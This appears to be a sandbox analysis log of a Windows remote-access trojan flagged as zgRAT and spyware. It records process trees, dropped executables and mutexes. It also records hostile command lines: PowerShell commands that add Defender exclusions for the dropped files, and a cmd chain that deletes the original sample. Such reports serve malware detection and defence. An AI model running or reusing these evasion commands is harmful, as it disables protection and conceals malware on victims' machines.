                                Source: Wh2c6sgwRo.exe, 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSteal1.exe, vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exeBinary or memory string: OriginalFilenameSteal1.exe, vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: Wh2c6sgwRo.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: Wh2c6sgwRo.exe, FMIJCCJDKMPOHDNPCEAGFDMNEAPEGCIPGDDK.csCryptographic APIs: 'CreateDecryptor'
                                Source: Wh2c6sgwRo.exe, FMIJCCJDKMPOHDNPCEAGFDMNEAPEGCIPGDDK.csCryptographic APIs: 'CreateDecryptor'
                                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@54/78@4/5
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Wh2c6sgwRo.exe.logJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3e5e94f0e11171c3961d1e5f3808d36c9dca912cf9a303ebba50229f9f225d68
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMutant created: NULL
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeMutant created: \Sessions\1\BaseNamedObjects\NsbCvHTAlAlcWgB
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                Source: Wh2c6sgwRo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: Wh2c6sgwRo.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061DFB000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061DF1000.00000004.00000800.00020000.00000000.sdmp, wWN8CJ4lbM.27.dr, YXlvdEN7SI.27.dr, 6I3KYvMc2T.27.dr, 6QFthbp1ni.27.dr, szKE9Jtpia.27.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: Wh2c6sgwRo.exeReversingLabs: Detection: 63%
                                Source: Wh2c6sgwRo.exeVirustotal: Detection: 77%
                                Source: unknownProcess created: C:\Users\user\Desktop\Wh2c6sgwRo.exe "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"
                                Source: unknownProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: windows.staterepositoryps.dllJump to behavior
